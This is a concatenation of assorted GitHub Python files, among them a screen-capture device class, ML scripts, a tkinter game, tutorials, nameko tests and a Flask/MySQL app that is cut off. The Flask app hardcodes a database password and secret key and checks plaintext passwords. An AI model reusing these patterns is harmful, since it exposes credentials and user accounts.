ctypes.POINTER(IDXGIOutput1)()\n self.adapter.EnumOutputs(i, ctypes.byref(p_output))\n p_outputs.append(p_output)\n i += 1\n except comtypes.COMError as ce:\n if ctypes.c_int32(DXGI_ERROR_NOT_FOUND).value == ce.args[0]:\n break\n else:\n raise ce\n return p_outputs\n\n @property\n def description(self) -> str:\n return self.desc.Description\n\n @property\n def vram_size(self) -> int:\n return self.desc.DedicatedVideoMemory\n\n @property\n def vendor_id(self) -> int:\n return self.desc.VendorId\n\n def __repr__(self) -> str:\n return \"<{} Name:{} Dedicated VRAM:{}Mb VendorId:{}>\".format(\n self.__class__.__name__,\n self.desc.Description,\n self.desc.DedicatedVideoMemory // 1048576,\n self.desc.VendorId,\n )\n","repo_name":"ra1nty/DXcam","sub_path":"dxcam/core/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","stars":339,"dataset":"github-code","pt":"96"} +{"seq_id":"22538242913","text":"def mating():\n values = input()\n values = values.split()\n \n k = int(values[0])\n m = int(values[1])\n n = int(values[2])\n \n total = k + m + n\n newtotal = total - 1\n \n #8 possible outcomes with dominant allele\n \n KK = ((k/total)*((k-1)/(newtotal)))\n KM = ((k/total)*(m/newtotal)) + ((m/total)*(k/newtotal))\n KN = ((k/total) * (n/newtotal)) + ((n/total)*(k/newtotal))\n MN = 0.5*(((m/total) * (n/newtotal)) + ((n/total)*(m/newtotal)))\n MM = 0.75*((m/total) * ((m-1)/newtotal))\n \n Probability = KK + KM + KN + MN + MM\n \n\n return Probability \n\nprint(mating())\n ","repo_name":"andrewgans/Final-Rosalind-Projects","sub_path":"IPRB.py","file_name":"IPRB.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"25208019546","text":"# Uncertainty of Recurrent Neural Network models with dropout at time of prediction\n\n# %load 4_pred_uncertainty.py\nimport src.core as mlModule\nimport src.core_configs as configs\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndef plotDropoutPrediction(modelList, predictions, means, stds, targetColumns, df_test, y_test, traintime=None):\n if traintime is not None:\n trainEndStr = [item for sublist in traintime for item in sublist]\n else:\n trainEndStr = None\n\n for i in range(len(modelList)):\n output_mean = means[i]\n output_std = stds[i]\n\n for j in range(output_mean.shape[-1]):\n mean = output_mean[:, j]\n std = output_std[:, j]\n\n upper = np.add(mean, std)\n lower = np.subtract(mean, std)\n\n fig, ax = plt.subplots(1, 1, figsize=(10,3), dpi=100)\n ax.set_xlabel('Date')\n ax.set_ylabel(mlModule._columnUnits[targetColumns[j]])\n ax.set_title(modelList[i].name + \"\\nPredictions and targets, \" + mlModule._columnDescriptions[targetColumns[j]])\n ax.plot(df_test.iloc[mlModule._maxEnrolWindow:].index, y_test[mlModule._maxEnrolWindow:, j], color=\"red\", alpha=0.5, label=\"targets\")\n ax.plot(df_test.iloc[mlModule._maxEnrolWindow:].index, upper, color=\"grey\", alpha=0.7, label=\"+/- 1 std bounds\")\n ax.plot(df_test.iloc[mlModule._maxEnrolWindow:].index, lower, color=\"grey\", alpha=0.7)\n ax.plot(df_test.iloc[mlModule._maxEnrolWindow:].index, mean, color=\"blue\", alpha=1.0, label=\"prediction\")\n ax.grid(1, axis='y')\n ax.legend(bbox_to_anchor=(1.05, 1), loc='upper left', borderaxespad=0., prop={'size': 10})\n \n if trainEndStr:\n for i, trainEndString in enumerate(trainEndStr):\n ax.axvline(x=pd.to_datetime(trainEndString, dayfirst=True), color='black' if i 
% 2 == 0 else 'blue', label='start training' if i % 2 == 0 else 'end training')\n\n plt.show()\n\ndef performDropoutPrediction(facility, model, resolution, lookback=12, retrain=False):\n filename, columns, irrelevantColumns, targetColumns, traintime, testtime, columnOrder = configs.getConfig(facility, model, resolution)\n\n df = mlModule.initDataframe(filename, columns, irrelevantColumns)\n df_train, df_test = mlModule.getTestTrainSplit(traintime, testtime)\n X_train, y_train, X_test, y_test = mlModule.getFeatureTargetSplit(targetColumns)\n\n lstm = mlModule.LSTM('LSTMs 1x128 d0.2 mod'+model, layers=[128], training=True, dropout=0.2, recurrentDropout=0.2, enrolWindow=lookback)\n gru = mlModule.GRU('GRUs 1x128 d0.2 mod'+model, layers=[128], training=True, dropout=0.2, recurrentDropout=0.2, enrolWindow=lookback)\n \n modelList = [\n lstm,\n gru,\n ]\n\n mlModule.initModels(modelList)\n mlModule.trainModels(retrain)\n\n predictions, means, stds = mlModule.predictWithModelsUsingDropout(numberOfPredictions=30)\n plotDropoutPrediction(modelList, predictions, means, stds, targetColumns, df_test, y_test, traintime)\n\nmodel = 'A'\n\nperformDropoutPrediction('F', model, '30min', 12, retrain=False)\nmlModule.reset()\nperformDropoutPrediction('G', model, '30min', 12, retrain=False)\nmlModule.reset()\nperformDropoutPrediction('G', model, '10min', 12*3, retrain=False)\n","repo_name":"hermanwh/master-thesis","sub_path":"py_examples/4_pred_uncertainty.py","file_name":"4_pred_uncertainty.py","file_ext":"py","file_size_in_byte":3336,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"96"} +{"seq_id":"40079571513","text":"from tkinter import *\nimport tkinter.messagebox\nimport math\nimport chat_utils\nimport pickle\n\nX = 600\nY = 480\nR = 15\nCO = 0.2\n\n\nclass GAME:\n def __init__(self, s, online, home, name, op):\n self.mainwindow = Tk()\n self.online = online\n self.ai_speed = 2\n self.ai_iq = 0.5\n if self.online:\n self.op = op\n else:\n self.op = 'Computer'\n self.name = name\n self.mainwindow.title('Game: ' + self.name)\n self.me = s\n self.win = 0\n self.lose = 0\n self.ai = True\n self.CV = Canvas(self.mainwindow, width=X, height=Y)\n self.CV.create_line(R, R, X - R, R)\n self.CV.create_line(X - R, R, X - R, Y - R)\n self.CV.create_line(R, R, R, Y - R)\n self.CV.create_line(R, Y - R, X - R, Y - R)\n self.home = home\n if self.home:\n self.cx = [X / 4, X * 3 / 4]\n else:\n self.cx = [X * 3 / 4, X / 4]\n self.cy = [Y / 2, Y / 2]\n self.xg = [0, 0]\n self.yg = [0, 0]\n self.ball0 = self.CV.create_oval((self.cx[0] - R, self.cy[0] - R, self.cx[0] + R, self.cy[0] + R), fill='black')\n self.ball1 = self.CV.create_oval((self.cx[1] - R, self.cy[1] - R, self.cx[1] + R, self.cy[1] + R), fill='white')\n self.mainwindow.bind('<KeyPress>', self.move)\n self.frame0 = Frame(self.mainwindow)\n self.frame1 = Frame(self.mainwindow)\n self.frame2 = Frame(self.mainwindow)\n self.frame_bottom = Frame(self.mainwindow)\n self.frame_top = Frame(self.mainwindow)\n self.frame_blank0 = Frame(self.mainwindow)\n self.frame_blank1 = Frame(self.mainwindow)\n self.label_b = Label(self.frame_bottom, text=' ')\n self.label_t = Label(self.frame_top, text=' ')\n self.label_blank0 = Label(self.frame_blank0, text=' ')\n self.label_blank1 = Label(self.frame_blank1, text=' ')\n self.score = StringVar()\n self.score.set(\" You \" + str(self.win) + \" : \" + str(self.lose) + \" Opponent\")\n self.label = Label(self.frame0, textvariable=self.score)\n self.difficulty = StringVar()\n 
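# Backing variable for the difficulty OptionMenu below; read by initial_ai()\n 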
self.difficulty.set('Normal')\n self.option = OptionMenu(self.frame1, self.difficulty, 'Easy', 'Normal', 'Hard')\n self.button_ai = Button(self.frame2, text=\" AI start \", command=self.start_ai)\n self.button_quit = Button(self.frame2, text=' Quit ', command=self.quit)\n self.label.pack()\n self.label_blank0.pack()\n self.label_blank1.pack()\n self.button_ai.pack(side='left')\n self.button_quit.pack()\n self.frame_top.pack()\n self.frame0.pack()\n self.CV.pack()\n self.frame_blank0.pack()\n self.option.pack()\n self.label_b.pack()\n self.label_t.pack()\n self.frame1.pack()\n self.frame_blank1.pack()\n self.frame2.pack()\n self.frame_bottom.pack()\n self.physics()\n if self.online:\n self.exchange()\n\n def start(self):\n self.mainwindow.mainloop()\n\n def move(self, event):\n if event.char.lower() == 's':\n self.yg[0] += 2\n if event.char.lower() == 'k':\n self.yg[1] += 2\n if event.char.lower() == 'a':\n self.xg[0] -= 2\n if event.char.lower() == 'j':\n self.xg[1] -= 2\n if event.char.lower() == 'w':\n self.yg[0] -= 2\n if event.char.lower() == 'i':\n self.yg[1] -= 2\n if event.char.lower() == 'd':\n self.xg[0] += 2\n if event.char.lower() == 'l':\n self.xg[1] += 2\n\n def save(self):\n try:\n infile = open(self.name + '.dat', 'rb')\n dic = pickle.load(infile)\n infile.close()\n except IOError:\n dic = {}\n if self.op in dic.keys():\n dic[self.op].append((self.win, self.lose))\n else:\n dic[self.op] = [(self.win, self.lose)]\n infile = open(self.name + '.dat', 'wb')\n pickle.dump(dic, infile)\n infile.close()\n\n def quit(self):\n self.save()\n if self.online:\n chat_utils.mysend(self.me, chat_utils.M_QGAME)\n self.mainwindow.destroy()\n\n def distance(self):\n return math.sqrt((self.cx[0] - self.cx[1]) ** 2 + (self.cy[0] - self.cy[1]) ** 2)\n\n def start_ai(self):\n self.initial_ai()\n self.match_up()\n\n def initial_ai(self):\n if self.difficulty.get() == 'Easy':\n self.ai_speed = 1.5\n self.ai_iq = 0.5\n elif self.difficulty.get() == 'Normal':\n self.ai_speed = 2\n self.ai_iq = 3\n elif self.difficulty.get() == 'Hard':\n self.ai_speed = 2.5\n self.ai_iq = 7\n\n def match_up(self):\n x = self.cx[0] - self.cx[1]\n y = self.cy[0] - self.cy[1]\n t = math.sqrt(x ** 2 + y ** 2)\n self.xg[1] += self.ai_speed * x / t\n self.yg[1] += self.ai_speed * y / t\n if self.cx[1] < X * CO:\n self.xg[1] += self.ai_iq\n if self.cx[1] + R > X * (1 - CO):\n self.xg[1] -= self.ai_iq\n if self.cy[1] - R < Y * CO:\n self.yg[1] += self.ai_iq\n if self.cy[1] + R > Y * (1 - CO):\n self.yg[1] -= self.ai_iq\n if self.ai:\n self.mainwindow.after(200, self.match_up)\n else:\n self.xg[1] = 0\n self.yg[1] = 0\n\n def hit(self):\n if self.distance() <= 2 * R:\n tmp0 = math.sqrt(self.xg[0] ** 2 + self.yg[0] ** 2)\n tmp1 = math.sqrt(self.xg[1] ** 2 + self.yg[1] ** 2)\n x = self.cx[0] - self.cx[1]\n y = self.cy[0] - self.cy[1]\n tmp = math.sqrt(x ** 2 + y ** 2)\n self.xg[0] = x / tmp * tmp1\n self.yg[0] = y / tmp * tmp1\n self.xg[1] = -x / tmp * tmp0\n self.yg[1] = -y / tmp * tmp0\n\n def exchange(self):\n chat_utils.mysend(self.me, chat_utils.M_INGAME +\n str(self.cx[0]) + ' ' + str(self.cy[0]) + ' ' +\n str(self.xg[0]) + ' ' + str(self.yg[0]))\n move = chat_utils.myrecv(self.me)\n if len(move) > 0:\n if move[0] == chat_utils.M_INGAME:\n op = move[1:].split()\n for i in range(4):\n op[i] = float(op[i])\n self.cx[1] = op[0]\n self.cy[1] = op[1]\n self.xg[1] = op[2]\n self.yg[1] = op[3]\n self.CV.after(50, self.exchange)\n elif move[0] == chat_utils.M_QGAME:\n self.save()\n self.online = False\n 
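# Opponent sent M_QGAME: results were already saved above, so just close the window\n 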
self.mainwindow.destroy()\n\n def physics(self):\n self.hit()\n for i in range(2):\n if self.xg[i] > 0:\n self.xg[i] = max(self.xg[i] - 0.05, 0)\n if self.xg[i] < 0:\n self.xg[i] = min(self.xg[i] + 0.05, 0)\n if self.yg[i] > 0:\n self.yg[i] = max(self.yg[i] - 0.05, 0)\n if self.yg[i] < 0:\n self.yg[i] = min(self.yg[i] + 0.05, 0)\n if (self.cx[i] + self.xg[i] >= R) and \\\n (self.cx[i] + self.xg[i] <= X - R) and \\\n (self.cy[i] + self.yg[i] >= R) and \\\n (self.cy[i] + self.yg[i] <= Y - R):\n self.cx[i] += self.xg[i]\n self.cy[i] += self.yg[i]\n else:\n if i == 0:\n self.lose += 1\n else:\n self.win += 1\n self.ai = False\n self.cx[i] += self.xg[i]\n self.cy[i] += self.yg[i]\n self.CV.coords(self.ball0, (self.cx[0] - R, self.cy[0] - R, self.cx[0] + R, self.cy[0] + R))\n self.CV.coords(self.ball1, (self.cx[1] - R, self.cy[1] - R, self.cx[1] + R, self.cy[1] + R))\n if self.home:\n self.cx = [X / 4, X * 3 / 4]\n else:\n self.cx = [X * 3 / 4, X / 4]\n self.cy = [Y / 2, Y / 2]\n self.xg = [0, 0]\n self.yg = [0, 0]\n if i == 0:\n self.score.set(\" You \" + str(self.win) + \" : \" + str(self.lose) + \" Opponent\")\n tkinter.messagebox.showinfo(\"Information\",\n \"You are out!\")\n else:\n self.score.set(\" You \" + str(self.win) + \" : \" + str(self.lose) + \" Opponent\")\n tkinter.messagebox.showinfo(\"Information\",\n \"You win!\")\n self.ai = True\n self.CV.coords(self.ball0, (self.cx[0] - R, self.cy[0] - R, self.cx[0] + R, self.cy[0] + R))\n self.CV.coords(self.ball1, (self.cx[1] - R, self.cy[1] - R, self.cx[1] + R, self.cy[1] + R))\n self.mainwindow.after(5, self.physics)\n\n\nif __name__ == '__main__':\n MyGUI = GAME('s', False, True, 'lin', '')\n MyGUI.start()\n","repo_name":"ShenghaoLin/HittingBall","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":9033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"30017010511","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 27 23:01:31 2020\n\n@author: Asus\n\"\"\"\n\n#getitem-setitem kullanımı\n\n\n#bazı nesneleri method gibi çağırabiliriz __cal__ ile çağırıyoruz \nclass Sample:\n def __call__(self):\n print('__call__ called')\n \ns = Sample()\ns() # s.__call__()\n\n#__call__ argüman gönderme \nclass Sample:\n def __call__(self, x, y, z):\n print('__call__ called')\n return x + y + z\n \ns = Sample()\nresult = s(10, 20, 30) \nprint(result)\n\n#yukaridaki örneğin en genel hali \nclass Sample:\n def __call__(self, *args):\n print('__call__ called')\n return sum(args)\n \ns = Sample()\nresult = s(10, 20, 30, 40, 50) \nprint(result)\n\n#sınıf nesnesini köşeli parantezle kullanmak istersem getitem ile eşdeğerdir. 
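(EN: using an object with square brackets, o[i], is equivalent to calling o.__getitem__(i))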
\nclass Sample:\n def __getitem__(self, index):\n print('__getitem__')\n return index * 2\n \ns = Sample()\n\nx = s[10] # s.__getitem(10)\nprint(x)\n\n#Sınıfımı array gibi kullandım \nclass Array:\n def __init__(self, size):\n self.array = [0] * size\n\n def __getitem__(self, index):\n return self.array[index]\n\n\na = Array(10)\nx = a[3] # a.__getitem__(3)\nprint(x)\n\n#getitem-setitem örnek \nclass Array:\n def __init__(self, size):\n self.array = [0] * size\n \n def __getitem__(self, index):\n return self.array[index]\n \n def __setitem__(self, index, val):\n self.array[index] = val\n \ns = Array(10)\nfor i in range(10):\n s[i] = i\n \nfor i in range(10):\n print(s[i], end=' ')\n\n\n\n#tarih sanki bir diziymiş gibi belli bir elemanını alıp kullanıyorum \nclass Date:\n def __init__(self, day, month, year):\n self.day = day\n self.month = month\n self.year = year\n \n def __str__(self):\n return f'{self.day}/{self.month}/{self.year}'\n \n def __getitem__(self, index):\n if index < 0 or index > 2:\n raise IndexError('out of range')\n if index == 0:\n return self.day\n if index == 1:\n return self.month\n return self.year\n \n\nd = Date(10, 12, 2009)\nprint(d)\nday = d[0]\nprint(day)\nmonth = d[1]\nprint(month)\nyear = d[2]\nprint(year)\n\n\n\n\n#Setitem örnek: \nclass Date:\n def __init__(self, day, month, year):\n self.day = day\n self.month = month\n self.year = year\n \n def __str__(self):\n return f'{self.day}/{self.month}/{self.year}'\n \n def __getitem__(self, index):\n if index < 0 or index > 2:\n raise IndexError('out of range')\n if index == 0:\n return self.day\n if index == 1:\n return self.month\n return self.year\n \n def __setitem__(self, index, val):\n if index < 0 or index > 2:\n raise IndexError('out of range')\n if index == 0:\n self.day = val\n elif index == 1:\n self.month = val\n else:\n self.year = val\n\nd = Date(10, 12, 2009)\n\nprint(d)\nd[0] = 20\nprint(d) \n\n\n#karma örnek: \nclass Sample:\n def __init__(self):\n self.dict = {}\n \n def __setitem__(self, key, value):\n self.dict[key] = value\n \n def __getitem__(self, key):\n return self.dict[key]\n \n \ns = Sample()\ns['ali'] = 300\ns['veli'] = 200\ns[100] = 'kazım'\n\nprint(s['ali'])\nprint(s['veli'])\nprint(s[100]) \n\n\n\n#matrix ekrana basma örneği \nclass Matrix:\n def __init__(self, nrows, ncols):\n self.matrix = [[0] * ncols for i in range(nrows)]\n\n def __getitem__(self, index):\n return self.matrix[index[0]][index[1]]\n\n def __setitem__(self, index, val):\n self.matrix[index[0]][index[1]] = val\n\n def __str__(self):\n s = ''\n for i in range(len(self.matrix)):\n for k in range(len(self.matrix[0])):\n if k != 0:\n s += ' '\n s += str(self.matrix[i][k])\n s += '\\n'\n\n return s\n\nm = Matrix(5, 5)\n\nfor i in range(5):\n for k in range(5):\n m[i, k] = i + k\n\nfor i in range(5):\n for k in range(5):\n print(m[i, k], end=' ')\n print()\n \nprint()\nprint(m) #str şeklinde ekrana basıyor \n\n#kendi yazdığımız sınıfta slicing işlemi yapma örneği \n#slice built in sınıfıyla bunu yapabiliriz \n#slice nesnesi oluşturup içinden istediğimizi çekebiliyoruz \n\nclass Sample:\n def __int__(self):\n return 100\n \ns = Sample()\nx = int(s) # s.__int__()\nprint(x)\n\n\n#Math operations by my class\nimport math\nclass Rational:\n def __init__(self, a, b = 1):\n self.a = a\n self.b = b\n\n if self.b < 0:\n self.a = -self.a\n self.b = -self.b\n\n self.simplify()\n\n def simplify(self):\n result = math.gcd(abs(self.a), abs(self.b))\n self.a //= result\n self.b //= result\n\n def __str__(self):\n if self.b == 0:\n raise 
ValueError('invalid rational number!')\n if self.b == 1:\n return str(self.a)\n if self.a == 0:\n return '0'\n return f'{self.a}/{self.b}'\n\n def __add__(self, r):\n num = self.a * r.b + self.b * r.a\n denom = self.b * r.b\n return Rational(num, denom)\n\n def __sub__(self, r):\n num = self.a * r.b - self.b * r.a\n denom = self.b * r.b\n return Rational(num, denom)\n\n def __mul__(self, r):\n num = self.a * r.a\n denom = self.b * r.b\n return Rational(num, denom)\n\n def __truediv__(self, r):\n num = self.a * r.b\n denom = self.b * r.a\n return Rational(num, denom)\n\n def __pow__(self, x):\n num = self.a ** x\n denom = self.b ** x\n return Rational(num, denom)\n\n def __lt__(self, r):\n return self.a / self.b < r.a / r.b\n\n def __le__(self, r):\n return self.a / self.b <= r.a / r.b\n\n def __gt__(self, r):\n return self.a / self.b > r.a / r.b\n\n def __ge__(self, r):\n return self.a / self.b >= r.a / r.b\n\n def __eq__(self, r):\n return self.a / self.b == r.a / r.b\n\n def __ne__(self, r):\n return self.a / self.b != r.a / r.b\n\n def __neg__(self):\n return Rational(-self.a, self.b)\n\n def __pos__(self):\n return Rational(self.a, self.b)\n \n def __float__(self):\n return self.a / self.b\n \n\nr = Rational(2, 3)\nf = float(r)\nprint(f)\n ","repo_name":"dogancantorun8/Python_Learning","sub_path":"oop/getitem-setitem.py","file_name":"getitem-setitem.py","file_ext":"py","file_size_in_byte":6384,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"17318437799","text":"from django.core.mail import BadHeaderError, send_mail\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.apps import apps \nfrom .decorators import check_recaptcha\nfrom .forms import ContactForm\n\n@check_recaptcha\ndef form(request):\n \"\"\" This view displays and processes the contact form \"\"\"\n if request.method == 'GET':\n form = ContactForm()\n else: # Post request\n form = ContactForm(request.POST)\n if form.is_valid():\n name = form.cleaned_data['name']\n subject = form.cleaned_data['subject']\n email = form.cleaned_data['email']\n message = form.cleaned_data['message']\n try:\n send_mail(subject, message, email, [apps.get_app_config('Contactform').contact_form_recipient,])\n except BadHeaderError:\n messages.error(request, 'Invalid header found, please try again.')\n return redirect('contactform:success')\n\n return render(request, 'contactform/form.html', {\n 'meta_title': 'Contact Form',\n 'meta_description': 'Get in touch or open a support ticket.',\n 'form': form\n })\n\n\ndef success(request):\n \"\"\" Displays the success page \"\"\"\n return render(request, 'contactform/success.html', {\n 'meta_title': 'Thanks for your message',\n 'meta_description': 'Your message has been received, we\\'ll reply as soon as possible.'})\n","repo_name":"flaab/pz-django-contactform","sub_path":"contactform/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"13136060812","text":"import pandas as pd \nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.linear_model import SGDClassifier\nimport numpy as np\n\ndata_from_csv = pd.read_csv('movie_train.csv', header=0)\ndata_from_csv['Runtime'] = data_from_csv['Runtime'].apply(str)\n\ndef _generate_data(data):\n\t'''Generates each line of movie at a 
time'''\n\tfor item in data:\n\t\tyield item\n\n\n# Split the data into testing data and training data \ntraining_data = _generate_data(data_from_csv[['Runtime', 'Director', 'Writer', 'Actor']][:-15].values)\ntesting_data = _generate_data(data_from_csv[['Runtime', 'Director', 'Writer', 'Actor']][-15:].values)\n\n#Generate features and transform using countVectorizer and TfidfTransformer\ncount_vect = CountVectorizer()\nX_train_counts = count_vect.fit_transform(str(x) for x in training_data)\n\n#transform the data into numpy array that .fit expects\ntf_transformer = TfidfTransformer()\nX_train_tfidf = tf_transformer.fit_transform(X_train_counts)\n\n#NaiveBayes classifier\nclf = MultinomialNB().fit(X_train_tfidf, data_from_csv['Target'][:-15].values)\n\n#now test on 2016 data \ntest_data_from_csv = pd.read_csv('movie_test.csv', header=0)\ndef _generate_test_data():\n\t'''generates each row of csv file at a time'''\n\tfor item in test_data_from_csv[['Runtime', 'Director', 'Writer', 'Actor']].values:\n\t\tyield item\ntest_gen = _generate_test_data()\n\n\n#transform the string data to numpy array\nX_c = count_vect.transform(str(movie) for movie in test_gen)\nX_tf = tf_transformer.transform(X_c)\nfor movie, target in zip(test_data_from_csv['Name'], clf.predict(X_tf)):\n\tif target == 1:\n\t\tprint ('{movie} is Success'.format(movie=movie))\n\telse:\n\t\tprint ('{movie} is flop'.format(movie=movie))\nprint () \nprint ('Now svm implementation')\nprint ()\n\n# SVM classifier with deault parameters\nsvm_clf = SGDClassifier(loss='hinge')\nsvm_clf.fit(X_train_tfidf, data_from_csv['Target'][:-15].values)\nfor movie, target in zip(test_data_from_csv['Name'], svm_clf.predict(X_tf)):\n\tif target == 1:\n\t\tprint ('{movie} is Success'.format(movie=movie))\n\telse:\n\t\tprint ('{movie} is flop'.format(movie=movie))\n\n\n#evaluation of performance\ntest_counts = count_vect.transform(str(movie) for movie in testing_data)\ntest_tfidf = tf_transformer.transform(test_counts)\nnv_predicted = clf.predict(test_tfidf)\nprint ('Naive Bayes accuracy ', np.mean(nv_predicted == data_from_csv['Target'][-15:].values))\n\nsvm_predicted = svm_clf.predict(test_tfidf)\nprint ('SVM accuracy ',np.mean(svm_predicted == data_from_csv['Target'][-15:].values))\n\ndef main():\n\tpass\n\nif __name__ == '__main__':\n\tmain()","repo_name":"prashant-977/MachineLearningAssignments","sub_path":"MoviePrediction/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"39008569487","text":"#!/usr/bin/env python3\nimport time\nfrom termcolor import cprint\n\n\ndef insertion_sort(arr):\n global iterations\n\n iterations = 0\n arr = list(arr)\n x = []\n y = arr.copy()\n\n list_index = 0\n for i in range(len(arr)**len(arr)):\n if list_index + 1 == len(arr):\n cprint(\"Search complete\", \"green\")\n break\n\n \n if arr[list_index] > arr[list_index + 1]:\n list_index += 1\n y = list_index\n \n if list_index <= 1:\n\n \n arr[y], arr[y - 1] = arr[y - 1], arr[y]\n iterations += 1\n \n elif list_index > 1:\n \n while arr[y] < arr[y-1]:\n\n arr[y], arr[y-1] = arr[y-1], arr[y]\n iterations += 1\n y -= 1\n if y == 1 and arr[y] < arr[y-1]:\n arr[y], arr[y-1] = arr[y-1], arr[y]\n iterations += 1\n break\n\n\n \n \n elif arr[list_index] < arr[list_index + 1]:\n list_index += 1\n iterations += 1\n \n print(arr)\n cprint(str(iterations) + \" iterations!\", \"red\")\n\n\nlary = input(\"Give a list to be sorted: 
\")\ninsertion_sort(lary)\n","repo_name":"RitCh123/SortingAlgorithms","sub_path":"insertion_sort.py","file_name":"insertion_sort.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"35515281735","text":"import pytest\nfrom mock import Mock\nfrom nameko.testing.services import dummy, entrypoint_hook\nfrom nameko.containers import ServiceContainer, WorkerContext\nfrom pymongo import MongoClient\nfrom pymongo.database import Database\n\nfrom nameko_mongodb.database import MongoDatabase\n\n\nclass DummyService(object):\n name = 'dummy_service'\n\n database = MongoDatabase()\n\n @dummy\n def insert_one(self, document):\n res = self.database.test_collection.insert_one(document)\n return res\n\n @dummy\n def find_one(self, query):\n doc = self.database.test_collection.find_one(query)\n return doc\n \n @dummy\n def corrupted_method(self):\n return 1/0\n\n\n@pytest.fixture\ndef config(db_url):\n return {\n 'MONGODB_CONNECTION_URL': db_url\n }\n\n\n@pytest.fixture\ndef container(config):\n return Mock(spec=ServiceContainer, config=config, service_name='dummy_service')\n\n\n@pytest.fixture\ndef database(container):\n return MongoDatabase().bind(container, 'database')\n\n\ndef test_setup(database):\n database.setup()\n assert isinstance(database.client, MongoClient)\n assert isinstance(database.database, Database)\n\n\ndef test_stop(database):\n database.setup()\n assert database.client\n\n database.stop()\n assert not hasattr(database, 'client')\n\n\ndef test_get_dependency(database):\n database.setup()\n\n worker_ctx = Mock(spec=WorkerContext)\n db = database.get_dependency(worker_ctx)\n assert isinstance(db, Database)\n\n\ndef test_end_to_end(db_url, container_factory):\n config = {\n 'MONGODB_CONNECTION_URL': db_url\n }\n\n container = container_factory(DummyService, config)\n container.start()\n\n with entrypoint_hook(container, 'insert_one') as insert_one:\n insert_one({'toto': 'titi'})\n\n with entrypoint_hook(container, 'find_one') as find_one:\n doc = find_one({'toto': 'titi'})\n assert doc['toto'] == 'titi'\n \n with entrypoint_hook(container, 'corrupted_method') as corrupted_method:\n try:\n corrupted_method()\n except:\n pass\n\n client = MongoClient(config['MONGODB_CONNECTION_URL'])\n db = client.dummy_service\n logs = db.logging.find({})\n\n for r in logs:\n if r['method_name'] == 'find_one':\n assert r['status'] == 'SUCCESS'\n elif r['method_name'] == 'insert_one':\n assert r['status'] == 'SUCCESS'\n elif r['method_name'] == 'corrupted_method':\n assert r['status'] == 'FAILED'\n assert r['exception']\n","repo_name":"saiqi/nameko-mongodb","sub_path":"tests/test_nameko_mongodb.py","file_name":"test_nameko_mongodb.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"350184056","text":"from collections import deque\n\nclass Graph:\n def __init__(self, edges, n):\n self.adjList = [[] for _ in range(n)]\n\n for (src, dest) in edges:\n self.adjList[src].append(dest)\n self.adjList[dest].append(src)\n\n\ndef BFS(graph, v, discovered):\n q = deque()\n q.append(v)\n\n discovered[v] = True\n\n while q:\n v = q.popleft()\n print(v, end=\" \")\n\n for edges in graph.adjList[v]:\n if not discovered[edges]:\n q.append(edges)\n discovered[edges] = True\n \n\n\n\nif __name__ == '__main__':\n edges = [\n (1, 2), (1, 3), (1, 4), (2, 5), (2, 6), (5, 9),\n (5, 10), (4, 7), (4, 8), (7, 11), (7, 12)\n ]\n\n 
n = 15\n\n discovered = [False] * n \n graph = Graph(edges, n)\n\n for i in range(n):\n if not discovered[i]:\n BFS(graph, i, discovered)","repo_name":"sasori-s/Problem-Solving-2023","sub_path":"TechieDelight/Graphs/3_bfs.py","file_name":"3_bfs.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"5272208867","text":"from flask import Flask\nfrom flask import request, jsonify, session\nfrom flaskext.mysql import MySQL\nfrom flask_login import login_required\nfrom flask_cors import CORS\n\n\napp=Flask(__name__)\nCORS(app)\nmysql = MySQL()\napp.config['MYSQL_DATABASE_HOST'] = 'localhost'\napp.config['MYSQL_DATABASE_USER'] = 'root'\napp.config['MYSQL_DATABASE_PASSWORD'] = '261093'\napp.config['MYSQL_DATABASE_DB'] = 'gestion_isp'\nmysql.init_app(app)\napp.secret_key = 'mysecretkey'\n\n@app.route('/login', methods=['POST'])\ndef login():\n username = request.json['username']\n password = request.json['password']\n \n conn = mysql.connect()\n cursor = conn.cursor()\n \n cursor.execute('SELECT * FROM usuario WHERE usuario=%s AND contrasenia=%s', (username, password))\n user = cursor.fetchone()\n \n conn.close()\n \n if user:\n session['username'] = username\n return jsonify({'message': 'Inicio de sesión exitoso'})\n else:\n return jsonify({'error': 'Credenciales inválidas'})\n\n\n@app.route('/clientes')\ndef index():\n sql = \"SELECT idcliente, dni, apellido, nombre FROM cliente\"\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(sql)\n empleados = cursor.fetchall()\n conn.commit()\n empleados_dict = []\n for empleado in empleados:\n empleado_dict = {\n 'idcliente': empleado[0],\n 'dni': empleado[1],\n 'apellido': empleado[2],\n 'nombre': empleado[3]\n }\n empleados_dict.append(empleado_dict)\n return jsonify(empleados_dict)\n\n@app.route('/clientesTotal')\ndef clientes():\n sql = \"SELECT * FROM cliente\"\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(sql)\n empleados = cursor.fetchall()\n conn.commit()\n empleados_dict = []\n for empleado in 